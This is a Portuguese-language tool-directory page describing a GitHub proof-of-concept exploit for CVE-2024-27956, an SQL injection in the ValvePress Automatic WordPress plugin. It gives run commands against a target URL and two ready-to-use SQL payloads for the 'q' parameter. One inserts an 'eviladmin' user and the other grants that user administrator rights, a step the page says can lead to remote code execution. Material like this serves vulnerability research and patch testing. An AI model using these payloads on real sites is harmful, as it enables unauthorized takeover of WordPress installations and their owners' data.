Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-27956-RCE — PoC para SQL Injection no CVE-2024-27956 | Kitploit
Ferramentas/GitHubGitHub/diego-tella/cve-2024-27956-rce
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoDesenvolvimento de Payloads
GitHubdiego-tella/cve-2024-27956-rce

CVE-2024-27956-RCE

PoC para SQL Injection no CVE-2024-27956

Ver Repositório
90252há 2 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-27956-RCE

Um PoC para CVE-2024-27956, uma injeção de SQL no plugin ValvePress Automatic. Este PoC explora a vulnerabilidade criando um usuário no alvo e concedendo direitos de Administrador. Ser um administrador no WordPress pode levar à Execução Remota de Código.

Uso

root@kitploit:~
git clone https://github.com/diego-tella/CVE-2024-27956-RCE/
cd CVE-2024-27956-RCE
python exploit.py http://target.com

Payloads

Payload de injeção SQL para criar um usuário:
root@kitploit:~
q=INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_status, display_name) VALUES ('eviladmin', '$P$BASbMqW0nlZRux/2IhCw7AdvoNI4VT0', 'eviladmin', '[email protected]', 'http://127.0.0.1:8000', '2024-04-30 16:26:43', 0, 'eviladmin')

Concedendo direitos de administrador:

root@kitploit:~
q=INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES ((SELECT ID FROM wp_users WHERE user_login = 'eviladmin'), 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}

No parâmetro q, podemos passar toda a nossa query e ela será executada.

image A entrada do usuário é executada diretamente sem qualquer tipo de restrição ou sanitização.

Baixar ferramenta

PoC